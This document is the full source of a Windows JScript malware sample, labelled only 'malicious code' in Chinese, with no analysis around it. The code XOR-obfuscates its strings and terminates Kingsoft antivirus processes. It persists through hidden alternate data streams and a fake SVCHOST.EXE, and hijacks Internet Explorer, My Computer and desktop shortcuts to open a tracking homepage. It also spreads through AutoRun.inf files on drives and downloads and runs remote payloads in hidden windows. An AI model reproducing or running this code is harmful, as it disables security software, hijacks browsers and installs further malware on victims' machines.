恶意代码
var y_aaa = "D638DB7F-24DA-4FAC-BD9C-3678E8DA3A5B";
var e_ad = "a3jfi22w-a23483-2fjde24s-jf2aj";
var f_cd = "b3jfs22w-a23s83-2fsde24s-js2aj";
var e_bd = "d3jfi22w-b23483-2fjde24s-jf2aj";
var e_cd = "s3jfie2w-f2348sj-2fjie244-jfaaj";
var y_id = "23jfieow-f23487j-2fjie344-jfajj";
var m_id = "13oj32-f34j-232344-jfo234j";
var s_id = "23i234jf-fjwi234-234324-1234j";
var d_id = "234-fjwi234-234324-1234j";
var Fso;
var WshShell;
var abxx = new Array();
var acxx = 0;
var Q3 = ["112^116^68^85^78^87^83^9^116^79^66^75^75", "116^68^85^78^87^83^78^73^64^9^97^78^75^66^116^94^84^83^66^74^104^69^77^66^68^83"];
var LRQ = ["106^102^127^115^111^104^105^9^98^127^98", "115^111^98^112^104^117^107^99^9^98^127^98", "110^98^127^119^107^104^117^98^9^98^127^98", "20^17^23^116^98^9^98^127^98", "116^104^96^104^114^98^127^119^107^104^117^98^117^9^98^127^98", "115^115^117^102^113^98^107^98^117^9^98^127^98", "97^110^117^98^97^104^127^9^98^127^98", "96^117^98^98^105^101^117^104^112^116^98^117^9^98^127^98", "106^126^110^118^9^98^127^98", "108^126^107^110^105^101^117^104^112^116^98^117^9^98^127^98", "104^119^98^117^102^9^98^127^98"];
var NODELFILE;
var CreateDate = "";
var CountUrl = "79^83^83^87^29^8^8^79^70^72^9^84^69^22^16^20^9^68^72^74^8^24";
var nspace = "116^104^97^115^112^102^117^98^123^106^78^68^85^72^84^72^65^83^123^112^78^73^67^72^80^84^123^100^82^85^85^66^73^83^113^66^85^84^78^72^73^123^98^95^87^75^72^85^66^85^123^99^66^84^76^83^72^87^123^105^70^74^66^116^87^70^68^66";
Fso = new ActiveXObject(t(Q3[1]));
WshShell = new ActiveXObject(t(Q3[0]));
var Spath = WshShell.Environment("PROCESS");
var SystemRootPath = Spath("SystemRoot");
var dtag = false;
var c = ["79^83^83^87^29^8^8^79^70^72^9^84^69^22^16^20^9^68^72^74^8^24", "79^83^83^87^29^8^8^79^70^72^9^84^69^22^16^20^9^68^72^74^8^24"];
var turl = "83^70^72^69^70^72^9^80^93^22^22^21^21^9^68^72^74^8^83^70^72^69^70^72^22^9^79^83^74^75^24";
var furl = "79^83^83^87^29^8^8^80^81^80^9^64^70^74^66^22^22^21^21^9^68^72^74^8^24";
var tsite = "79^83^83^87^29^8^8^80^81^80^9^80^93^22^22^21^21^9^68^72^74^8^83^69^70^72^78^68^72^9^78^68^72";
var tico = Spath("SystemRoot") + "\\System32\\tbao.ico";
var fico = Spath("SystemRoot") + "\\System32\\fswf.ico";
var Gsite = "http://down.bbb.com/_smp/jskms.zip";
var Q1 = ["AllUsersDesktop", "AllUsersStartMenu", "AppData"];
Main();
function Main() {
var Args;
var VirusLoad;
var VirusAss;
Args = WScript.Arguments;
VirusLoad = GetMainVirus(1);
VirusAss = GetMainVirus(0);
var ArgNum = 0;
var Param = "";
var SubParam = "";
while (ArgNum < Args.length) {
Param = Param + " " + Args(ArgNum);
ArgNum++
}
Param = Param.substring(1);
SubParam = Param.substr(Param.length - 3);
SubParam = SubParam.toUpperCase();
CreateDate = GetInfectedDate();
switch (SubParam) {
case "RUN":
var RunPath = (WScript.ScriptName).substr(0, 2);
Run(RunPath);
InvadeSyste(VirusLoad, VirusAss);
Run("%SystemRoot%\\system\\SVCHOST.EXE " & VirusLoad);
break;
case "EXE":
WshShell.Popup(Param);
var RunPath = "\"" + Param + "\"";
Run(RunPath);
break;
case "OIE":
var RunPath = "\"%ProgramFiles%\\Internet Explorer\\IEXPLORE.EXE\" " + t(c[0]) + CreateDate;
Run(RunPath);
InvadeSystem(VirusLoad, VirusAss);
Run("%SystemRoot%\\system\\SVCHOST.EXE " + VirusLoad);
break;
case "TAOIE":
var RunPath = "\"%ProgramFiles%\\Internet Explorer\\IEXPLORE.EXE\" " + t(c[1]) + CreateDate;
Run(RunPath);
InvadeSystem(VirusLoad, VirusAss);
Run("%SystemRoot%\\system\\SVCHOST.EXE " + VirusLoad);
break;
case "OMC":
var RunPath = "explorer.exe /n,::{953704B0-5A8C-463B-B23B-01D465BA6459}";
Run(RunPath);
InvadeSystem(VirusLoad, VirusAss);
Run("%SystemRoot%\\system\\SVCHOST.EXE " + VirusLoad);
break;
case "EMC":
var RunPath = "explorer.exe /n,/e,::{953704B0-5A8C-463B-B23B-01D465BA6459}";
Run(RunPath);
InvadeSystem(VirusLoad, VirusAss);
Run("%SystemRoot%\\system\\SVCHOST.EXE " + VirusLoad);
break;
default:
if (PreDblInstance()) WScript.quit();
MonitorSystem()
}
}
function MonitorSystem() {
var ProcessNames, ExeFullNames;
ProcessNames = ["KSafeTray.exe", "kwstray.exe", "KSafeSvc.exe", "kxetray.exe", "kismain.exe"];
var VBSFullNames = Array(GetMainVirus(1));
while (1 == 1) {
KillProcess(ProcessNames);
InvadeSystem(GetMainVirus(1), GetMainVirus(0));
KeepProcess(VBSFullNames);
j();
WScript.Sleep(3000)
}
}
function KeepProcess(VBSFullNames) {
for (var VBSFullName in VBSFullNames) {
if (VBSProcessCount(VBSFullNames[VBSFullName]) < 2) Run("%SystemRoot%\\system\\SVCHOST.EXE " + VBSFullNames[VBSFullName])
}
}
function KillProcess(ProcessNames) {
var WMIService = GetObject("winmgmts:\\\\.\\root\\cimv2");
for (var ProcessName in ProcessNames) {
var ProcessList = WMIService.execquery(" Select * From win32_process where name ='" + ProcessNames[ProcessName] + "' ");
var T = new Enumerator(ProcessList);
while (!T.atEnd()) {
T.item().terminate();
T.moveNext()
}
}
}
function KillImmunity(D) {
var ImmunityFolder = D + ":\\Autorun.inf";
if (Fso.FolderExists(ImmunityFolder)) {
WshSHell.Run("CMD /C CACLS \"" + ImmunityFolder + "\" /t /e /c /g everyone:f", 0, true);
WshSHell.Run("CMD /C RD /S /Q " + ImmunityFolder, 0, true)
}
}
function InvadeSystem(VirusLoadPath, VirusAssPath) {
var DiskVirusName;
var Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version, CutDate;
Load_Value = "\"" + VirusLoadPath + "\"";
File_Value = "%SystemRoot%\\System32\\WScript.exe \"" + VirusAssPath + "\" %1 %* ";
IE_Value = "%SystemRoot%\\System32\\WScript.exe \"" + VirusAssPath + "\" OIE ";
MyCpt_Value1 = "%SystemRoot%\System32\\WScript.exe \"" + VirusAssPath + "\" OMC ";
MyCpt_Value2 = "%SystemRoot%\\System32\\WScript.exe \"" + VirusAssPath + "\" EMC ";
HCULoad = "HKEY_CURRENT_USER\\SoftWare\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load";
HCUVer = "HKEY_CURRENT_USER\\SoftWare\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Ver";
HCUDate = "HKEY_CURRENT_USER\\SoftWare\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Date";
if (GetInfectedDate() == "") {
wmiWriteReg("HKEY_CURRENT_USER", "SoftWare\\Microsoft\\Windows NT\\CurrentVersion\\Windows", "Date", getNowFormatDate(), "REG_SZ")
}
CreateDate = GetInfectedDate();
VirusCode = GetCode(WScript.ScriptFullName);
var GID = "{1f4de370-d627-11d1-ba4f-00a0c91eedba}";
var GTitle = "Internet Explorer";
var GICO = n();
var iePath = "\\Internet Explorer.zie";
var taoPath = "\\ÌÔ±¦ÈÈÂô.ztb";
var flashPath = "\\ÍæÐ¡ÓÎÏ·.zsw";
for (var T in Q1) {
var tmpPath = WshShell.SpecialFolders(Q1[T]);
if (Q1[T] == "AppData") tmpPath = tmpPath + "\\Microsoft\\Internet Explorer\\Quick Launch";
CreateIco(".zie", GICO, GICO + " " + t(c[1]) + CreateDate, tmpPath + iePath);
CreateIco(".ztb", tico, GICO + " " + t(turl) + CreateDate, tmpPath + taoPath);
CreateIco(".zsw", fico, GICO + " " + t(furl) + CreateDate, tmpPath + flashPath)
}
var tmpPath = WshShell.SpecialFolders("Startup");
var Start_Value = SystemRootPath + "\\System\\svchost.exe \"" + VirusAssPath + "\"";
CreateIco(".zei", GICO, Start_Value, tmpPath + "\\Internet Explorer.zei");
Version = 18;
CutDate = new Date().toDateString();
HostSourcePath = Fso.GetSpecialFolder(1) + "\\Wscript.exe";
HostFilePath = Fso.GetSpecialFolder(0) + "\\system\\SVCHOST.EXE";
var JCML = ["AllUsersDesktop", "Desktop", "AllUsersStartMenu", "AppData"];
for (var i in JCML) {
var tmpPath = WshShell.SpecialFolders(JCML[i]);
if (JCML[i] == "AppData") tmpPath = tmpPath + "\\Microsoft\\Internet Explorer\\Quick Launch";
CreateLRQ(tmpPath)
}
if (!Fso.FileExists(VirusAssPath) || !Fso.FileExists(VirusLoadPath) || !Fso.FileExists(HostFilePath) || GetVersion() < Version) {
if (GetFileSystemType(GetSystemDrive()) == "NTFS") {
CreateFile(VirusCode, VirusAssPath);
CreateFile(VirusCode, VirusLoadPath);
wmiCopyFile(HostSourcePath, HostFilePath);
SetHiddenAttr(HostFilePath)
} else {
CreateFile(VirusCode, VirusAssPath);
SetHiddenAttr(VirusAssPath);
CreateFile(VirusCode, VirusLoadPath);
SetHiddenAttr(VirusLoadPath);
wmiCopyFile(HostSourcePath, HostFilePath);
SetHiddenAttr(HostFilePath)
}
}
if (ReadReg(HCULoad) != Load_Value) {}
if (GetVersion() < Version) {
wmiWriteReg("HKEY_CURRENT_USER", "SoftWare\\Microsoft\\Windows NT\\CurrentVersion\\Windows", "Ver", Version, "REG_SZ");
try {
WshShell.Run(t(CountUrl), 0, false)
} catch(XX) {}
}
if (ReadReg("HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Applications\\iexplore.exe\\shell\\open\\command\\") != IE_Value) {}
if (ReadReg("HKEY_CLASSES_ROOT\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command\\") != IE_Value) {}
if (ReadReg("HKEY_CLASSES_ROOT\\CLSID\\{953704B0-5A8C-463B-B23B-01D465BA6459}\\shell\\open\\command\\") != MyCpt_Value1) {}
if (ReadReg("HKEY_CLASSES_ROOT\\CLSID\\{953704B0-5A8C-463B-B23B-01D465BA6459}\\shell\\explore\\command\\") != MyCpt_Value2) {}
}
function CreateAutoRun(D, VirusName) {
var InfPath, VBSPath, VBSCode;
InfPath = D + ":\\AutoRun.inf";
VBSPath = D + ":\\" + VirusName;
VBSCode = GetCode(WScript.ScriptFullName);
if (Fso.FileExists(InfPath) == false || Fso.FileExists(VBSPath) == false) {
CreateFile(VBSCode, VBSPath);
SetHiddenAttr(VBSPath);
var StrInf = "[AutoRun]\r\nShellexecute=WScript.exe " + VirusName + " \"AutoRun\"\r\nshell\\open=´ò¿ª(&O)\r\nshell\\open\\command=WScript.exe " + VirusName + " \"AutoRun\"\r\nshell\\open\\Default=1\r\nshell\\explore=×ÊÔ´¹ÜÀíÆ÷(&X)\r\nshell\\explore\\command=WScript.exe " + VirusName + " \"AutoRun\"";
KillImmunity(D);
CreateFile(StrInf, InfPath);
SetHiddenAttr(InfPath)
}
}
function CopyFile(source, pathf) {
try {
if (Fso.FileExists(pathf)) {
Fso.DeleteFile(pathf, true)
}
Fso.CopyFile(source, pathf)
} catch(R) {}
}
function CreateFile(code, pathf) {
try {
if (Fso.FileExists(pathf)) {
var FileText = Fso.OpenTextFile(pathf, 2, false);
FileText.Write(code);
FileText.Close()
} else {
var FileText = Fso.OpenTextFile(pathf, 2, true);
FileText.Write(code);
FileText.Close()
}
} catch(X) {}
}
function RegSet() {
var RegPath1, RegPath2, RegPath3, RegPath4;
RegPath1 = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN\\CheckedValue";
RegPath2 = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue";
RegPath3 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDriveTypeAutoRun";
RegPath4 = "HKEY_CLASSES_ROOT\\lnkfile\\IsShortcut";
if (ReadReg(RegPath1) != 3) {
wmiWriteReg("HKEY_LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN", "CheckedValue", 3, "REG_DWORD")
}
if (ReadReg(RegPath2) != 2) {
wmiWriteReg("HKEY_LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL", "CheckedValue", 2, "REG_DWORD")
}
}
function ReadReg(strkey) {
var Reg;
try {
var tmps = new ActiveXObject("WScript.Shell");
Reg = tmps.RegRead(strkey)
} catch(R) {
Reg = ""
}
return Reg
}
function DeleteReg(strkey) {
try {
var tmps = new ActiveXObject("WScript.Shell");
tmps.RegDelete(strkey)
} catch(R) {}
}
function SetHiddenAttr(path) {
try {
var vf = Fso.GetFile(path);
vf.Attributes = 6
} catch(R) {}
}
function Run(ExeFullName) {
WshShell = new ActiveXObject("wScRipT.SHelL");
WshShell.run(ExeFullName)
}
function InfectRoot(D, VirusName) {
var VBSCode;
VBSCode = GetCode(WScript.ScriptFullName);
var VBSPath = D + ":\\" & VirusName;
if (!Fso.FileExists(VBSPath)) {
CreateFile(VBSCode, VBSPath);
SetHiddenAttr(VBSPath)
}
}
function GetMainVirus(N) {
var MainVirus;
var MainVirusName = GetSerialNumber(GetSystemDrive()) + ".jse";
if (GetFileSystemType(GetSystemDrive()) == "NTFS") {
if (N == 1) MainVirus = Fso.GetSpecialFolder(N) + "\\smss.exe:" + MainVirusName;
if (N == 0) MainVirus = Fso.GetSpecialFolder(N) + "\\explorer.exe:" + MainVirusName
} else {
MainVirus = Fso.GetSpecialFolder(N) + "\\" + MainVirusName
}
return MainVirus
}
function GetSerialNumber(Drv) {
var SerialNumber;
try {
var d = Fso.GetDrive(Drv);
SerialNumber = String(d.SerialNumber);
SerialNumber = SerialNumber.replace("-", "");
return SerialNumber
} catch(R) {}
}
function GetSystemDrive() {
var SystemDrive = String(Fso.GetSpecialFolder(0));
SystemDrive = SystemDrive.substr(0, 2);
return SystemDrive
}
function GetFileSystemType(Drive) {
var d = Fso.GetDrive(Drive);
var FileSystemType = String(d.FileSystem);
return FileSystemType
}
function PreDblInstance() {
var DblInstance = false;
if (VBSProcessCount(WScript.ScriptFullName) >= 3) DblInstance = true;
return DblInstance
}
function VBSProcessCount(VBSPath) {
var WMIService, ProcessList, Process;
var VBSProcessCount = 0;
var WMIService = GetObject("winmgmts:\\\\.\\root\\cimv2");
var ProcessList = WMIService.ExecQuery("Select * From Win32_Process WHERE name='cscript.exe' or name='wscript.exe' or name='svchost.exe'");
var T = new Enumerator(ProcessList);
while (!T.atEnd()) {
var ProCmdLing = T.item().CommandLine;
if (ProCmdLing != null) {
if (ProCmdLing.indexOf(VBSPath) > 0) VBSProcessCount = VBSProcessCount + 1
}
T.moveNext()
}
return VBSProcessCount
}
function GetInfectedDate() {
var DateInfo, InfectedDate;
DateInfo = "HKEY_CURRENT_USER\\SoftWare\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Date";
if (ReadReg(DateInfo) == "") {
InfectedDate = ""
} else {
InfectedDate = ReadReg(DateInfo)
}
return InfectedDate
}
function GetCode(FullPath) {
var FileText = Fso.OpenTextFile(FullPath, 1);
var GetCode = FileText.ReadAll();
FileText.Close();
return GetCode
}
function GetVersion() {
var VerInfo, Version;
VerInfo = "HKEY_CURRENT_USER\\SoftWare\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Ver";
if (ReadReg(VerInfo) == "") Version = 0;
else Version = parseInt(ReadReg(VerInfo));
return Version
}
function SetIEAss(sFilePath) {
var Value;
Value = "%SystemRoot%\\System32\\WScript.exe \"" + sFilePath + "\" OIE ";
wmiWriteReg("HKEY_LOCAL_MACHINE", "SOFTWARE\\Classes\\Applications\\iexplore.exe\\shell\\open\\command", "", Value, "REG_EXPAND_SZ");
wmiWriteReg("HKEY_CLASSES_ROOT", "CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command", "", Value, "REG_EXPAND_SZ")
}
function SetMyComputerAss(sFilePath) {
try {
var Value1, Value2;
Value1 = "%SystemRoot%\\System32\\WScript.exe \"" + sFilePath + "\" OMC ";
Value2 = "%SystemRoot%\\System32\\WScript.exe \"" + sFilePath + "\" EMC ";
wmiWriteReg("HKEY_CLASSES_ROOT", "CLSID\\{953704B0-5A8C-463B-B23B-01D465BA6459}\\shell\\open\\command", "", Value1, "REG_EXPAND_SZ");
wmiWriteReg("HKEY_CLASSES_ROOT", "CLSID\\{953704B0-5A8C-463B-B23B-01D465BA6459}\\shell\\explore\\command", "", Value2, "REG_EXPAND_SZ")
} catch(X) {}
}
function CCC(_GID, _GICO, _GTitle, _GIE, _Gurl) {
try {
var HKEY_LOCAL_MACHINE = 0x80000002;
var HKCR = 0x80000000;
var HKCU = 0x80000001;
var RWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
var strKeyPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\" + _GID;
var strKeyPath1 = "CLSID\\" + _GID;
var strKeyPath2 = "CLSID\\" + _GID + "\\DefaultIcon";
var strKeyPath3 = "CLSID\\" + _GID + "\\shell";
var strKeyPath4 = "CLSID\\" + _GID + "\\shell\\OpenHomePage";
var strKeyPath5 = "CLSID\\" + _GID + "\\shell\\OpenHomePage\\Command";
var strKeyPath7 = "CLSID\\" + _GID + "\\ShellFolder";
RWMI.CreateKey(HKCR, strKeyPath1);
RWMI.SetStringValue(HKCR, strKeyPath1, "LocalizedString", _GTitle);
RWMI.CreateKey(HKCR, strKeyPath2);
RWMI.SetStringValue(HKCR, strKeyPath2, "", _GICO);
RWMI.CreateKey(HKCR, strKeyPath3);
RWMI.SetStringValue(HKCR, strKeyPath3, "", "OpenHomePage");
RWMI.CreateKey(HKCR, strKeyPath4);
RWMI.SetStringValue(HKCR, strKeyPath4, "", "´ò¿ªÖ÷Ò³(&H)");
RWMI.CreateKey(HKCR, strKeyPath5);
RWMI.SetStringValue(HKCR, strKeyPath5, "", _GIE + " " + _Gurl);
RWMI.CreateKey(HKCR, strKeyPath7);
RWMI.SetStringValue(HKCR, strKeyPath7, "", "HideOnDesktopPerUser");
RWMI.SetDWORDValue(HKCR, strKeyPath7, "Attributes", 0);
RWMI.CreateKey(HKEY_LOCAL_MACHINE, strKeyPath)
} catch(X) {}
};
function n() {
try {
var R = WshShell.RegRead("HKLM\\SOFTWARE\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command\\");
R = R.replace(/"/g, "")
} catch(S) {
return "C:\\Program Files\\Internet Explorer\\iexplore.exe"
}
if (R == "") {
return "C:\\Program Files\\Internet Explorer\\iexplore.exe"
}
return R
};
function t(R) {
var T = R.split("^");
for (var S in T) {
T[S] = T[S] ^ 39;
T[S] = String.fromCharCode(T[S])
}
return T.join("")
};
function h() {
C = d();
var RWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
try {
var S;
var R = ["{1f4de370-d627-11d1-ba4f-00a0c91eedba}", "{450D8FBA-AD25-11D0-98A8-0800361B1103}", "{645FF040-5081-101B-9F08-00AA002F954E}"];
for (S = 0; S < R.length; S++) {
R[S] = R[S].toUpperCase()
}
for (S = 0; S < C.length; S++) {
C[S] = C[S].toUpperCase()
}
for (S = 0; S < C.length; S++) {
if (!K(R, C[S])) {
RWMI.DeleteKey(0x80000002, t(nspace) + "\\" + C[S])
}
}
} catch(T) {}
};
function d() {
var S = 2147483650;
try {
oLoc = new ActiveXObject("WbemScripting.SWbemLocator");
oSvc = oLoc.ConnectServer(null, "root\\default");
oReg = oSvc.Get("StdRegProv");
oMethod = oReg.Methods_.Item("EnumKey");
oInParam = oMethod.InParameters.SpawnInstance_();
oInParam.hDefKey = S;
oInParam.sSubKeyName = t(nspace);
oOutParam = oReg.ExecMethod_(oMethod.Name, oInParam);
return oOutParam.sNames.toArray()
} catch(R) {
return []
}
};
function j() {
var i = [{
u: "79^83^83^87^29^8^8^80^80^80^9^80^93^22^30^19^30^9^68^72^74^8^24^65^70^81^20",
d: "26^26^32630^22375^23515^33293^26^26"
},
{
u: "79^83^83^87^29^8^8^83^70^72^69^70^72^9^80^93^22^22^21^21^9^68^72^74^8^83^70^72^69^70^72^22^9^79^83^74^75^24^65^70^81^20",
d: "26^26^28159^23482^36106^29262^26^26"
},
{
u: "79^83^83^87^29^8^8^80^81^80^9^64^70^74^66^22^22^21^21^9^68^72^74^8^24^65^70^81^22",
d: "26^26^29582^23592^28191^25128^26^26"
}];
var S = WshShell.SpecialFolders("Favorites");
var gg = WshShell.SpecialFolders("Templates") + "\\";
var S2 = S + "\\Á´½Ó";
if (!Fso.FolderExists(S2)) Fso.CreateFolder(S2);
try {
for (var T in i) {
var Rurl = S + "\\" + t(i[T]["d"]) + ".url";
var Rtmp = gg + t(i[T]["d"]) + ".bak";
if (!Fso.FileExists(Rurl)) {
var R = Fso.CreateTextFile(Rtmp, true);
R.WriteLine("[InternetShortcut]");
R.WriteLine("URL=" + t(i[T]["u"]));
R.Close();
cfile(Rtmp, Rurl)
}
var Rurl2 = S2 + "\\" + t(i[T]["d"]) + ".url";
var Rtmp2 = gg + t(i[T]["d"]) + "2.bak";
if (!Fso.FileExists(Rurl2)) {
var R = Fso.CreateTextFile(Rtmp2, true);
R.WriteLine("[InternetShortcut]");
R.WriteLine("URL=" + t(i[T]["u"]));
R.Close();
cfile(Rtmp2, Rurl2)
}
}
} catch(U) {}
};
function cfile(c1, c2) {
try {
var RCIMV = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var M = RCIMV.Get("CIM_DataFile.Name='" + c1 + "'");
M.Copy(c2);
M.Delete
} catch(X) {}
};
function CheckKws() {
var M = WshShell.SpecialFolders("AllUsersDesktop");
M = M.replace("×ÀÃæ", "Application Data");
M = M + "\\kingsoft\\kws\\kws.ini";
if (Fso.FileExists(M)) {
var tmp = GetCode(M);
if (tmp.indexOf("www.abc.com") < 1) GoldKey()
} else {
GoldKey()
}
var WMIService = GetObject("winmgmts:\\\\.\\root\\cimv2");
var pro_kws = false;
var ProcessList = WMIService.execquery(" Select * From win32_process where name ='KSWebShield.exe' ");
var T = new Enumerator(ProcessList);
while (!T.atEnd()) {
pro_kws = true;
T.moveNext()
}
if (!pro_kws) GoldKey()
}
function GoldKey() {
}
function sf(url, tof) {
};
function CreateWin32(_x_path, _work_Path) {
var HIDDEN_WINDOW = 12;
var WMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2:win32_processstartup");
var objConfig = WMI.SpawnInstance_();
objConfig.ShowWindow = HIDDEN_WINDOW;
var intProcessID = "";
var objProcess = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2:Win32_Process");
objProcess.Create(_x_path, _work_Path, objConfig, intProcessID)
};
function wmiCopyFile(source, pathf) {
var RCIMV = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
try {
if (Fso.FileExists(pathf)) {
Fso.DeleteFile(pathf, true)
}
var M = RCIMV.Get("CIM_DataFile.Name='" + source + "'");
M.Copy(pathf)
} catch(R) {}
}
function wmiWriteReg(a, b, c, d, e) {
var WshShell = new ActiveXObject("wScRipT.SHelL");
var RWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
var HK;
switch (a) {
case "HKEY_LOCAL_MACHINE":
HK = 0x80000002;
break;
case "HKEY_CURRENT_USER":
HK = 0x80000001;
break;
case "HKEY_CLASSES_ROOT":
HK = 0x80000000;
break;
case "HKEY_USERS":
HK = 0x80000003;
break;
default:
HK = 0x80000002
}
var ArrList = b.split("\\");
var ArrListLength = ArrList.length;
var str = "";
for (var i = 0; i < ArrListLength; i++) {
if (i == 0) {
str = ArrList[i]
} else {
str = str + "\\" + ArrList[i];
RWMI.CreateKey(HK, str)
}
}
switch (e) {
case "REG_SZ":
RWMI.SetStringValue(HK, b, c, d);
break;
case "REG_EXPAND_SZ":
RWMI.SetExpandedStringValue(HK, b, c, d);
break;
case "REG_BINARY":
RWMI.SetBinaryValue(HK, b, c, d);
break;
case "REG_DWORD":
RWMI.SetDWORDValue(HK, b, c, d);
break;
case "REG_MULTI_SZ":
RWMI.SetMultiStringValue(HK, b, c, d);
break;
default:
RWMI.SetStringValue(HK, b, c, d)
}
}
function CreateIco(oExz, oIco, oValue, oPath) {
try {
var RegPath1 = oExz + "\\shell\\open\\command";
var RegPath2 = oExz + "\\DefaultIcon";
var tmpPath = WshShell.SpecialFolders("Templates") + "\\tmp.tmp";
if (!Fso.FileExists(oPath)) {
wmiWriteReg("HKEY_CLASSES_ROOT", RegPath1, "", oValue, "REG_SZ");
wmiWriteReg("HKEY_CLASSES_ROOT", RegPath2, "", oIco, "REG_SZ");
wmiWriteReg("HKEY_CLASSES_ROOT", oExz, "", "¿ì½Ý·½Ê½", "REG_SZ");
wmiWriteReg("HKEY_CLASSES_ROOT", oExz, "NeverShowExt", "1", "REG_SZ");
CreateFile("", tmpPath);
cfile(tmpPath, oPath)
}
abxx[acxx] = Fso.OpenTextFile(oPath, 1);
acxx++;
if (acxx > 20) acxx = 0
} catch(X) {}
}
function dfile(DF) {
var RCIMV = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var M = RCIMV.Get("CIM_DataFile.Name='" + DF + "'");
M.Delete
};
function GetAllLnkFile(Y, W) {
var U, S, R, ab;
var X = new Array;
var T = W;
U = Fso.GetFolder(Y);
R = new Enumerator(U.files);
ab = "";
T = W.toUpperCase();
for (; ! R.atEnd(); R.moveNext()) {
var aa = R.item();
var Z = "";
Z += aa;
Z = Z.toUpperCase();
if ((Z.match(T + "$") == T)) {
X[X.length] = Z
}
}
return X
};
function CreateLRQ(Y) {
var T = GetAllLnkFile(Y, ".LNK");
for (var S in T) {
try {
var W = T[S];
var V;
var aa = "";
var U = "";
var R = "";
var ad = "";
var ab = /\.exe$/ig;
var Z = /system32/ig;
R = Fso.GetBaseName(W);
V = WshShell.CreateShortcut(W);
aa = V.TargetPath;
U = V.Arguments;
if (aa == "") {
continue
}
if (Z.test(aa)) {
continue
}
if (ab.test(aa)) {
if (Check_LRQ(aa)) {
var Texz = "." + aa.substr(aa.lastIndexOf("\\") + 1, 3);
var TICO = aa + ",0";
var Tvalue = aa + " " + t(c[1]) + CreateDate;
var Tpath = Y + "\\" + R + Texz;
CreateIco(Texz, TICO, Tvalue, Tpath);
dfile(W)
}
}
} catch(X) {}
}
};
function Check_LRQ(T) {
var U = T.toUpperCase();
for (var R in LRQ) {
if (U.indexOf(t(LRQ[R])) > 0) {
return true
}
}
return false
};
function getNowFormatDate() {
var day = new Date();
var Month = 0;
var Day = 0;
var CurrentDate = "";
Month = day.getMonth() + 1;
Day = day.getDate();
if (Month >= 10) {
CurrentDate += Month
} else {
CurrentDate += "0" + Month
}
if (Day >= 10) {
CurrentDate += Day
} else {
CurrentDate += "0" + Day
}
return CurrentDate
};
function SetupDownList(DownList) {
try {
var TempPath = WshShell.SpecialFolders("Templates");
var ppp = parseInt(Math.floor(Math.random() * 99999));
var xHttp = new ActiveXObject("Microsoft.XMLHTTP");
xHttp.Open("GET", DownList, 0);
xHttp.Send();
var zhi = xHttp.responseText;
var bao = zhi.split(",");
for (var T in bao) {
var tmpname = parseInt(Math.floor(Math.random() * 99999));
sf(bao[T], TempPath + "\\" + tmpname);
CreateWin32(TempPath + "\\" + tmpname, TempPath);
WScript.Sleep(3000)
}
} catch(X) {}
}
|